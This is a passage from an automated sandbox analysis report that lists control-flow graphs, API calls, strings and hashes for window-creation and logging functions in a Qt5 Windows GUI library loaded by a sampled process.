1067->1064 1068 7ffafacc1700 1070 7ffafacc1715 memset 1068->1070 1071 7ffafacc17b8 SystemParametersInfoW 1070->1071 1072 7ffafacc178e 1070->1072 1072->1071 1073 7ffafacc1792 SystemParametersInfoForDpi 1072->1073 1074 7ffafacb9140 1075 7ffafacb92a8 1074->1075 1076 7ffafacb9160 1074->1076 1077 7ffafacb916a ?isDebugEnabled@QLoggingCategory@ 1076->1077 1078 7ffafacb917b ?window@QPlatformWindow@@QEBAPEAVQWindow@ 1077->1078 1080 7ffafacb9213 1077->1080 1079 7ffafacc1420 1078->1079 1082 7ffafacb918c 7 API calls 1079->1082 1081 7ffafacb926e CoLockObjectExternal 1080->1081 1083 7ffafacb9222 ?window@QPlatformWindow@@QEBAPEAVQWindow@ 1080->1083 1084 7ffafacb928e RevokeDragDrop 1081->1084 1082->1080 1085 7ffafad00310 1083->1085 1084->1075 1086 7ffafacb9239 RegisterDragDrop CoLockObjectExternal 1085->1086 1086->1081

                                                                                                                                                                                                                Callgraph

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 0 7ffafacb3bd0-7ffafacb3caa GetModuleHandleW call 7ffafacc1090 call 7ffafacc18f0 ?initialGeometry@QPlatformWindow@@SA?AVQRect@@PEBVQWindow@@AEBV2@HHPEAPEBVQScreen@@@Z 5 7ffafacb3cf8-7ffafacb3dd4 ?utf16@QString@@QEBAPEBGXZ * 2 call 7ffafada208c call 7ffafacb1240 call 7ffafada208c call 7ffafacb4b90 * 2 call 7ffafacc1090 call 7ffafacc2410 0->5 6 7ffafacb3cac-7ffafacb3cb0 0->6 25 7ffafacb3dd6-7ffafacb3de1 5->25 26 7ffafacb3dfd-7ffafacb3e10 5->26 6->5 7 7ffafacb3cb2-7ffafacb3cb7 6->7 9 7ffafacb3cd5-7ffafacb3cee ?objectName@QObject@@QEBA?AVQString@@XZ ??4QUrl@@QEAAAEAV0@$$QEAV0@@Z 7->9 10 7ffafacb3cb9-7ffafacb3cd3 ?qAppName@@YA?AVQString@@XZ ??4QUrl@@QEAAAEAV0@$$QEAV0@@Z 7->10 12 7ffafacb3cf2 ??1QString@@QEAA@XZ 9->12 10->12 12->5 29 7ffafacb3de3 25->29 30 7ffafacb3de9-7ffafacb3df3 25->30 27 7ffafacb3e12-7ffafacb3e14 26->27 28 7ffafacb3e50-7ffafacb3e5a 26->28 27->28 31 7ffafacb3e16-7ffafacb3e26 ?qt_window_private@@YAPEAVQWindowPrivate@@PEAVQWindow@@@Z 27->31 32 7ffafacb3e62-7ffafacb3e7c call 7ffafacc1660 ?isDebugEnabled@QLoggingCategory@@QEBA_NXZ 28->32 29->30 30->26 33 7ffafacb3df5-7ffafacb3df8 call 7ffafada20c8 30->33 31->28 34 7ffafacb3e28-7ffafacb3e49 call 7ffafacb7250 31->34 40 7ffafacb3e82-7ffafacb4082 call 7ffafacc1660 ??0QMessageLogger@@QEAA@PEBDH00@Z ?debug@QMessageLogger@@QEBA?AVQDebug@@XZ ??6QDebug@@QEAAAEAV0@PEBD@Z ??6@YA?AVQDebug@@V0@PEBVQWindow@@@Z ??6QDebug@@QEAAAEAV0@PEBD@Z ??6QDebug@@QEAAAEAV0@AEBVQString@@@Z ??6QDebug@@QEAAAEAV0@PEBD@Z ??6QDebug@@QEAAAEAV0@AEBVQString@@@Z ??6QDebug@@QEAAAEAV0@D@Z call 7ffafacb1f50 ??6QDebug@@QEAAAEAV0@PEBD@Z ??6@YA?AVQDebug@@V0@AEBVQRect@@@Z ??6QDebug@@QEAAAEAV0@PEBD@Z ??6QDebug@@QEAAAEAV0@J@Z ??6QDebug@@QEAAAEAV0@D@Z ??6QDebug@@QEAAAEAV0@J@Z ??6QDebug@@QEAAAEAV0@D@Z ??6QDebug@@QEAAAEAV0@J@Z ??6QDebug@@QEAAAEAV0@D@Z ??6QDebug@@QEAAAEAV0@J@Z ??6QDebug@@QEAAAEAV0@PEBD@Z ??6@YA?AVQDebug@@V0@AEBVQMargins@@@Z ??6QDebug@@QEAAAEAV0@PEBD@Z ??6@YA?AVQDebug@@V0@AEBVQMargins@@@Z ??1QDebug@@QEAA@XZ * 6 32->40 41 7ffafacb4088-7ffafacb40b1 call 7ffafacb2e00 ?isTopLevel@QWindow@@QEBA_NXZ 32->41 33->26 34->32 40->41 46 7ffafacb40b3-7ffafacb40c6 GetWindowLongPtrW 41->46 47 7ffafacb4110 41->47 46->47 49 7ffafacb40c8-7ffafacb40e7 GetClientRect 46->49 50 7ffafacb4114-7ffafacb4181 CreateWindowExW call 7ffafacc1660 ?isDebugEnabled@QLoggingCategory@@QEBA_NXZ 47->50 49->50 52 7ffafacb40e9-7ffafacb40ef 49->52 57 7ffafacb4187-7ffafacb42bc call 7ffafacc1660 ??0QMessageLogger@@QEAA@PEBDH00@Z ?debug@QMessageLogger@@QEBA?AVQDebug@@XZ ??6QDebug@@QEAAAEAV0@PEBD@Z ??6@YA?AVQDebug@@V0@PEBVQWindow@@@Z ??6QDebug@@QEAAAEAV0@D@Z ??6QDebug@@QEAAAEAV0@PEBX@Z ??6QDebug@@QEAAAEAV0@PEBD@Z ??6@YA?AVQDebug@@V0@AEBVQPoint@@@Z ??6@YA?AVQDebug@@V0@AEBVQSize@@@Z ??6QDebug@@QEAAAEAV0@D@Z ??6@YA?AVQDebug@@V0@AEBVQMargins@@@Z ??1QDebug@@QEAA@XZ * 4 50->57 58 7ffafacb42c0-7ffafacb42c3 50->58 52->50 54 7ffafacb40f1-7ffafacb40ff 52->54 54->50 56 7ffafacb4101-7ffafacb410e 54->56 56->50 57->58 60 7ffafacb42c5-7ffafacb430c ?qErrnoWarning@@YAXPEBDZZ 58->60 61 7ffafacb4311-7ffafacb4318 call 7ffafacc10a0 58->61 62 7ffafacb43eb-7ffafacb43f3 60->62 68 7ffafacb4358-7ffafacb435b 61->68 69 7ffafacb431a-7ffafacb432a call 7ffafacbe180 61->69 66 7ffafacb43f5-7ffafacb4400 62->66 67 7ffafacb441b-7ffafacb4453 ??1QString@@QEAA@XZ * 2 call 7ffafada2750 62->67 71 7ffafacb4402 66->71 72 7ffafacb4408-7ffafacb4411 66->72 76 7ffafacb435d-7ffafacb436a 68->76 77 7ffafacb436e-7ffafacb43e4 ??0QRect@@QEAA@AEBVQPoint@@AEBVQSize@@@Z 68->77 69->68 80 7ffafacb432c-7ffafacb4337 ?isTopLevel@QWindow@@QEBA_NXZ 69->80 71->72 72->67 73 7ffafacb4413-7ffafacb4416 call 7ffafada20c8 72->73 73->67 76->77 77->62 80->68 81 7ffafacb4339-7ffafacb434c ?flags@QWindow@@QEBA?AV?$QFlags@W4WindowType@Qt@@@@XZ 80->81 81->68 82 7ffafacb434e-7ffafacb4353 call 7ffafacb90c0 81->82 82->68
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32 ref: 00007FFAFACB3C52
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFACC18F0: ?flags@QWindow@@QEBA?AV?$QFlags@W4WindowType@Qt@@@@XZ.QT5GUI(?,?,?,00000000,?,?,?,FFFFFFFF,?,00007FFAFACB3C70), ref: 00007FFAFACC191E
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFACC18F0: ?property@QObject@@QEBA?AVQVariant@@PEBD@Z.QT5CORE ref: 00007FFAFACC1970
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFACC18F0: ?toBool@QVariant@@QEBA_NXZ.QT5CORE ref: 00007FFAFACC1979
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFACC18F0: ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FFAFACC1995
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFACC18F0: ?append@QString@@QEAAAEAV1@VQLatin1String@@@Z.QT5CORE ref: 00007FFAFACC19F4
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFACC18F0: ?append@QString@@QEAAAEAV1@VQLatin1String@@@Z.QT5CORE ref: 00007FFAFACC1A73
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFACC18F0: ?append@QString@@QEAAAEAV1@VQLatin1String@@@Z.QT5CORE ref: 00007FFAFACC1AA2
                                                                                                                                                                                                                • ?initialGeometry@QPlatformWindow@@SA?AVQRect@@PEBVQWindow@@AEBV2@HHPEAPEBVQScreen@@@Z.QT5GUI ref: 00007FFAFACB3C9D
                                                                                                                                                                                                                • ?qAppName@@YA?AVQString@@XZ.QT5CORE ref: 00007FFAFACB3CBD
                                                                                                                                                                                                                • ??4QUrl@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE ref: 00007FFAFACB3CC9
                                                                                                                                                                                                                • ?objectName@QObject@@QEBA?AVQString@@XZ.QT5CORE ref: 00007FFAFACB3CDC
                                                                                                                                                                                                                • ??4QUrl@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE ref: 00007FFAFACB3CE8
                                                                                                                                                                                                                • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFAFACB3CF2
                                                                                                                                                                                                                • ?utf16@QString@@QEBAPEBGXZ.QT5CORE ref: 00007FFAFACB3CFB
                                                                                                                                                                                                                • ?utf16@QString@@QEBAPEBGXZ.QT5CORE ref: 00007FFAFACB3D0C
                                                                                                                                                                                                                • ?qt_window_private@@YAPEAVQWindowPrivate@@PEAVQWindow@@@Z.QT5GUI(?), ref: 00007FFAFACB3E19
                                                                                                                                                                                                                • ?isDebugEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?), ref: 00007FFAFACB3E74
                                                                                                                                                                                                                • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE ref: 00007FFAFACB3EA4
                                                                                                                                                                                                                • ?debug@QMessageLogger@@QEBA?AVQDebug@@XZ.QT5CORE ref: 00007FFAFACB3EB4
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000015.00000002.2230402529.00007FFAFACB1000.00000020.00000001.01000000.00000065.sdmp, Offset: 00007FFAFACB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230320611.00007FFAFACB0000.00000002.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230636415.00007FFAFADA4000.00000002.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230712127.00007FFAFAE04000.00000004.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230768683.00007FFAFAE07000.00000008.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230818598.00007FFAFAE08000.00000004.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230862601.00007FFAFAE0A000.00000004.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230902204.00007FFAFAE0B000.00000002.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_7ffafacb0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: String@@$?append@Latin1String@@@Variant@@Window@@$?utf16@Logger@@MessageObject@@Url@@V0@$$V0@@Window$?debug@?flags@?initial?object?property@?qt_window_private@@Bool@Category@@DebugDebug@@Enabled@Flags@Geometry@H00@HandleLoggingModuleName@Name@@PlatformPrivate@@Qt@@@@Rect@@Screen@@@Type@Window@@@
                                                                                                                                                                                                                • String ID: requested: $ class=$ custom margins: $ invisible margins: $ obtained geometry: $ title=$%s: CreateWindowEx failed$CreateWindowEx: $CreateWindowEx: returns $WindowCreationData::create
                                                                                                                                                                                                                • API String ID: 3105017240-1297568575
                                                                                                                                                                                                                • Opcode ID: 6f621740b130703b87260702793e69f3542964c943ab397aa3f6cf660a5d5a46
                                                                                                                                                                                                                • Instruction ID: 1e3c69ceb6ad5354db8cd1ad1873a81e8ccca26cb5b3c27e4e53d8359d714be9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f621740b130703b87260702793e69f3542964c943ab397aa3f6cf660a5d5a46
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39426032A08B868AEB10DF65D8442ED3774FB46B88F408176DA5E4B7A5EF3CD589C740

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 84 7ffafacbd510-7ffafacbd53f ?type@QWindow@@QEBA?AW4WindowType@Qt@@XZ 85 7ffafacbd545-7ffafacbd580 call 7ffafada208c ??0QPlatformWindow@@QEAA@PEAVQWindow@@@Z GetDesktopWindow call 7ffafacc1660 ?isDebugEnabled@QLoggingCategory@@QEBA_NXZ 84->85 86 7ffafacbd69a-7ffafacbd6d9 ?flags@QWindow@@QEBA?AV?$QFlags@W4WindowType@Qt@@@@XZ ?isTopLevel@QWindow@@QEBA_NXZ 84->86 100 7ffafacbd692-7ffafacbd695 85->100 101 7ffafacbd586-7ffafacbd68c call 7ffafacc1660 ??0QMessageLogger@@QEAA@PEBDH00@Z ?debug@QMessageLogger@@QEBA?AVQDebug@@XZ ??6QDebug@@QEAAAEAV0@PEBD@Z ??6@YA?AVQDebug@@V0@PEBVQWindow@@@Z ??6QDebug@@QEAAAEAV0@P6AAEAVQTextStream@@AEAV1@@Z@Z * 2 ??6QDebug@@QEAAAEAV0@_K@Z ??6QDebug@@QEAAAEAV0@P6AAEAVQTextStream@@AEAV1@@Z@Z * 2 ??6@YA?AVQDebug@@V0@AEBVQRect@@@Z ??1QDebug@@QEAA@XZ * 3 85->101 88 7ffafacbd6db-7ffafacbd718 ?geometry@QWindow@@QEBA?AVQRect@@XZ ?scaleAndOrigin@QHighDpiScaling@@SA?AUScaleAndOrigin@1@PEBVQWindow@@PEAVQPoint@@@Z call 7ffafacb88e0 86->88 89 7ffafacbd71a-7ffafacbd752 ?geometry@QWindow@@QEBA?AVQRect@@XZ ?scaleAndOrigin@QHighDpiScaling@@SA?AUScaleAndOrigin@1@PEBVQWindow@@PEAVQPoint@@@Z call 7ffafacb88e0 86->89 96 7ffafacbd756-7ffafacbd77a ?property@QObject@@QEBA?AVQVariant@@PEBD@Z 88->96 89->96 98 7ffafacbd77c-7ffafacbd795 call 7ffafacbea20 ?userType@QVariant@@QEBAHXZ 96->98 99 7ffafacbd7ca-7ffafacbd855 ?title@QWindow@@QEBA?AVQString@@XZ call 7ffafacb4f00 call 7ffafacb36f0 ??1QString@@QEAA@XZ * 2 call 7ffafacc1660 ?isDebugEnabled@QLoggingCategory@@QEBA_NXZ 96->99 109 7ffafacbd7a2-7ffafacbd7ba ?convert@QVariant@@QEBA_NHPEAX@Z 98->109 110 7ffafacbd797-7ffafacbd7a0 ?constData@QVariant@@QEBAPEBXXZ 98->110 120 7ffafacbdab8-7ffafacbdabc 99->120 121 7ffafacbd85b-7ffafacbdab2 call 7ffafacc1660 ??0QMessageLogger@@QEAA@PEBDH00@Z ?debug@QMessageLogger@@QEBA?AVQDebug@@XZ ??6QDebug@@QEAAAEAV0@PEBD@Z ??6QDebug@@QEAAAEAV0@D@Z ??6@YA?AVQDebug@@V0@PEBVQWindow@@@Z ??6QDebug@@QEAAAEAV0@PEBD@Z ??6@YA?AVQDebug@@V0@AEBVQRect@@@Z ??6QDebug@@QEAAAEAV0@PEBD@Z call 7ffafacb8210 ??6QDebug@@QEAAAEAV0@_N@Z ??6QDebug@@QEAAAEAV0@D@Z ?qt_QMetaEnum_flagDebugOperator@@YA?AVQDebug@@AEAV1@_KPEBUQMetaObject@@PEBD@Z ??1QDebug@@QEAA@XZ * 2 ??6QDebug@@QEAAAEAV0@PEBD@Z ??6@YA?AVQDebug@@V0@AEBVQRect@@@Z ??6QDebug@@QEAAAEAV0@PEBD@Z ??6@YA?AVQDebug@@V0@AEBVQMargins@@@Z ??6QDebug@@QEAAAEAV0@PEBD@Z ??6QDebug@@QEAAAEAV0@PEBX@Z ??6QDebug@@QEAAAEAV0@D@Z ?qt_QMetaEnum_flagDebugOperator@@YA?AVQDebug@@AEAV1@_KPEBUQMetaObject@@PEBD@Z ??1QDebug@@QEAA@XZ * 2 ??6QDebug@@QEAAAEAV0@D@Z ??1QDebug@@QEAA@XZ * 7 99->121 103 7ffafacbdb1a-7ffafacbdb31 100->103 101->100 115 7ffafacbd7c3 109->115 116 7ffafacbd7bc-7ffafacbd7c1 109->116 113 7ffafacbd7c6 110->113 113->99 115->113 116->113 123 7ffafacbdb0c-7ffafacbdb17 ??1QVariant@@QEAA@XZ 120->123 124 7ffafacbdabe-7ffafacbdacb call 7ffafacb17d0 120->124 121->120 123->103 127 7ffafacbdad1-7ffafacbdadf ?isTopLevel@QWindow@@QEBA_NXZ 124->127 129 7ffafacbdaf4-7ffafacbdaff call 7ffaface5e50 127->129 130 7ffafacbdae1-7ffafacbdaeb call 7ffafacc24c0 127->130 129->123 136 7ffafacbdb01-7ffafacbdb07 call 7ffaface5de0 129->136 130->129 135 7ffafacbdaed 130->135 135->129 136->123
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000015.00000002.2230402529.00007FFAFACB1000.00000020.00000001.01000000.00000065.sdmp, Offset: 00007FFAFACB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230320611.00007FFAFACB0000.00000002.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230636415.00007FFAFADA4000.00000002.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230712127.00007FFAFAE04000.00000004.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230768683.00007FFAFAE07000.00000008.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230818598.00007FFAFAE08000.00000004.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230862601.00007FFAFAE0A000.00000004.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230902204.00007FFAFAE0B000.00000002.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_7ffafacb0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Debug@@$Window@@$Variant@@$??6@$DebugLogger@@MessageMetaObject@@Stream@@TextType@V1@@$Category@@Level@LoggingRect@@Rect@@@String@@WindowWindow@@@$?debug@?geometry@?property@?qt_?scaleEnabled@Enum_flagH00@HighModuleOpenOperatingOperator@@Origin@Origin@1@Point@@@ScaleScaling@@SystemV0@_V1@_Version@@$?compare@?const?convert@?current@?flags@?open?title@?type@?userContext@@Data@DesktopFlags@Init_thread_footerMargins@@@PlatformPoint@@Qt@@Qt@@@@Size@@@Type@1@V1@0@malloc
                                                                                                                                                                                                                • String ID: Obtained : $ Requested: $ frame incl.=$ handle=$ margins=$Desktop window:$QWindowsIntegration::createPlatformWindow$WindowType$_q_windowsCustomMargins
                                                                                                                                                                                                                • API String ID: 3386235196-792223184
                                                                                                                                                                                                                • Opcode ID: a79134d466744bca488f4a9fdad453400034804360a801268793b2fd74100578
                                                                                                                                                                                                                • Instruction ID: cdd1a6243afb775497bf749868fb1e01ee97cfe91d8a93f41969499a220f2d00
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a79134d466744bca488f4a9fdad453400034804360a801268793b2fd74100578
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F024A36A18B8AD5EB109F65E8442EC7374FB8AB85F408172DA5E0B7A5EF3CD549C300

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 139 7ffafacb17d0-7ffafacb18d3 ??0QPlatformWindow@@QEAA@PEAVQWindow@@@Z call 7ffafada208c call 7ffafacb11d0 call 7ffafacc1090 call 7ffafacbf5f0 ?type@QWindow@@QEBA?AW4WindowType@Qt@@XZ 148 7ffafacb1ec8-7ffafacb1ed9 139->148 149 7ffafacb18d9-7ffafacb1908 139->149 151 7ffafacb1922-7ffafacb1930 149->151 152 7ffafacb190a-7ffafacb1915 ?openGLModuleType@QOpenGLContext@@SA?AW4OpenGLModuleType@1@XZ 149->152 157 7ffafacb1932 151->157 158 7ffafacb1939-7ffafacb1994 ?window@QPlatformWindow@@QEBAPEAVQWindow@@XZ ?isTopLevel@QWindow@@QEBA_NXZ call 7ffafacbc600 call 7ffafacb84a0 ?qt_window_private@@YAPEAVQWindowPrivate@@PEAVQWindow@@@Z 151->158 153 7ffafacb1917-7ffafacb191a 152->153 154 7ffafacb191c 152->154 155 7ffafacb191f 153->155 154->155 155->151 157->158 163 7ffafacb1996 158->163 164 7ffafacb199a-7ffafacb199e 158->164 163->164 165 7ffafacb19a4-7ffafacb19b4 164->165 166 7ffafacb19a0 164->166 167 7ffafacb19ba-7ffafacb19ca call 7ffafacc1660 ?isDebugEnabled@QLoggingCategory@@QEBA_NXZ 165->167 168 7ffafacb1abe-7ffafacb1b0c ?window@QPlatformWindow@@QEBAPEAVQWindow@@XZ * 2 ?mask@QWindow@@QEBA?AVQRegion@@XZ ?scaleAndOrigin@QHighDpiScaling@@SA?AUScaleAndOrigin@1@PEBVQWindow@@PEAVQPoint@@@Z ?isActive@QHighDpiScaling@@SA_NXZ 165->168 166->165 176 7ffafacb19cc-7ffafacb1a1a call 7ffafacc1660 ??0QMessageLogger@@QEAA@PEBDH00@Z ?debug@QMessageLogger@@QEBA?AVQDebug@@XZ ??6QDebug@@QEAAAEAV0@PEBD@Z ??6QDebug@@QEAAAEAV0@N@Z ??1QDebug@@QEAA@XZ 167->176 177 7ffafacb1a20-7ffafacb1a36 167->177 170 7ffafacb1b20-7ffafacb1b45 ??0QRegion@@QEAA@XZ ?begin@QRegion@@QEBAPEBVQRect@@XZ ?end@QRegion@@QEBAPEBVQRect@@XZ 168->170 171 7ffafacb1b0e-7ffafacb1b1b ??0QRegion@@QEAA@AEBV0@@Z 168->171 174 7ffafacb1bb8-7ffafacb1bca ??0QRegion@@QEAA@$$QEAV0@@Z ??1QRegion@@QEAA@XZ 170->174 175 7ffafacb1b47 170->175 173 7ffafacb1bd0-7ffafacb1bec ?isEmpty@QRegion@@QEBA_NXZ 171->173 179 7ffafacb1c03-7ffafacb1c28 ?begin@QRegion@@QEBAPEBVQRect@@XZ ?end@QRegion@@QEBAPEBVQRect@@XZ 173->179 180 7ffafacb1bee-7ffafacb1bfe SetWindowRgn 173->180 174->173 178 7ffafacb1b50-7ffafacb1bb6 ??0QRectF@@QEAA@AEBVQRect@@@Z ??0QRectF@@QEAA@AEBVQPointF@@AEBVQSizeF@@@Z ?toRect@QRectF@@QEBA?AVQRect@@XZ ??YQRegion@@QEAAAEAV0@AEBVQRect@@@Z 175->178 176->177 184 7ffafacb1a38 177->184 185 7ffafacb1a3c-7ffafacb1a40 177->185 178->174 178->178 181 7ffafacb1c32-7ffafacb1c55 CreateRectRgn 179->181 182 7ffafacb1c2a-7ffafacb1c2d 179->182 186 7ffafacb1d48-7ffafacb1d67 ??1QRegion@@QEAA@XZ * 2 ?isTopLevel@QWindow@@QEBA_NXZ 180->186 189 7ffafacb1ce7-7ffafacb1d03 ?window@QPlatformWindow@@QEBAPEAVQWindow@@XZ ?isTopLevel@QWindow@@QEBA_NXZ 181->189 190 7ffafacb1c5b-7ffafacb1c67 181->190 182->189 184->185 192 7ffafacb1a42 185->192 193 7ffafacb1a46-7ffafacb1a4a 185->193 187 7ffafacb1e63-7ffafacb1e72 186->187 188 7ffafacb1d6d-7ffafacb1d81 ?icon@QWindow@@QEBA?AVQIcon@@XZ 186->188 199 7ffafacb1e74-7ffafacb1e9a ?property@QObject@@QEBA?AVQVariant@@PEBD@Z ?toBool@QVariant@@QEBA_NXZ 187->199 200 7ffafacb1ea0 187->200 194 7ffafacb1e59-7ffafacb1e5d ??1QIcon@@QEAA@XZ 188->194 195 7ffafacb1d87-7ffafacb1d91 188->195 197 7ffafacb1d05-7ffafacb1d22 OffsetRgn 189->197 198 7ffafacb1d28-7ffafacb1d3d SetWindowRgn 189->198 196 7ffafacb1c70-7ffafacb1c8f CreateRectRgn 190->196 192->193 201 7ffafacb1a4c 193->201 202 7ffafacb1a50-7ffafacb1a60 193->202 194->187 205 7ffafacb1d93-7ffafacb1d99 DestroyIcon 195->205 206 7ffafacb1da0-7ffafacb1daa 195->206 208 7ffafacb1cd2-7ffafacb1cd9 196->208 209 7ffafacb1c91-7ffafacb1cbb CreateRectRgn CombineRgn 196->209 197->198 198->186 210 7ffafacb1d3f-7ffafacb1d42 DeleteObject 198->210 199->200 203 7ffafacb1e9c-7ffafacb1e9e 199->203 207 7ffafacb1ea2-7ffafacb1ea6 200->207 201->202 202->168 204 7ffafacb1a62-7ffafacb1a6e 202->204 203->207 204->168 211 7ffafacb1a70-7ffafacb1ab8 ?window@QPlatformWindow@@QEBAPEAVQWindow@@XZ ?hasAlpha@QSurfaceFormat@@QEBA_NXZ call 7ffafacbb420 ??1QSurfaceFormat@@QEAA@XZ 204->211 205->206 214 7ffafacb1db9-7ffafacb1e27 GetSystemMetrics * 2 call 7ffafacb4460 GetSystemMetrics * 2 call 7ffafacb4460 206->214 215 7ffafacb1dac-7ffafacb1db2 DestroyIcon 206->215 212 7ffafacb1eb3-7ffafacb1ec5 207->212 213 7ffafacb1ea8-7ffafacb1ead ??1QVariant@@QEAA@XZ 207->213 208->196 218 7ffafacb1cdb-7ffafacb1cdf 208->218 216 7ffafacb1cc9-7ffafacb1ccc DeleteObject 209->216 217 7ffafacb1cbd-7ffafacb1cc6 DeleteObject 209->217 210->186 211->168 212->148 213->212 227 7ffafacb1e38-7ffafacb1e3e SendMessageW 214->227 228 7ffafacb1e29-7ffafacb1e36 SendMessageW 214->228 215->214 216->208 217->216 218->189 229 7ffafacb1e45-7ffafacb1e53 SendMessageW 227->229 228->229 229->194
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000015.00000002.2230402529.00007FFAFACB1000.00000020.00000001.01000000.00000065.sdmp, Offset: 00007FFAFACB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230320611.00007FFAFACB0000.00000002.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230636415.00007FFAFADA4000.00000002.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230712127.00007FFAFAE04000.00000004.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230768683.00007FFAFAE07000.00000008.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230818598.00007FFAFAE08000.00000004.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230862601.00007FFAFAE0A000.00000004.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230902204.00007FFAFAE0B000.00000002.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_7ffafacb0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window@@$Region@@$PlatformRect$?window@MessageRect@@$Debug@@MetricsSystemWindow$CreateDeleteLevel@ObjectSendVariant@@$?begin@?end@DestroyFormat@@HighIconIcon@@Logger@@ModuleOpenRect@@@Scaling@@SurfaceType@V0@@Window@@@$?debug@?has?icon@?mask@?open?property@?qt_window_private@@?scale?type@A@$$Active@Alpha@Bool@Category@@CombineContext@@DebugEmpty@Enabled@F@@@H00@LoggingObject@@OffsetOrigin@Origin@1@PointPoint@@@Private@@Qt@@Rect@ScaleSizeType@1@malloc
                                                                                                                                                                                                                • String ID: QWindowsWindow::setOpacity
                                                                                                                                                                                                                • API String ID: 2656739498-54840919
                                                                                                                                                                                                                • Opcode ID: e19384792abcd68fb1df469a9718a0f1b207dfaf4462333e4e3f9b0822492476
                                                                                                                                                                                                                • Instruction ID: 381548129a3d26e8872ba13894d3f01147382cf685ea2ffd2005002f936a5370
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e19384792abcd68fb1df469a9718a0f1b207dfaf4462333e4e3f9b0822492476
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8126022A08A86D2EB059F71E9543F97360FF56F84F008276DA6E1B795EF39E459C300

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
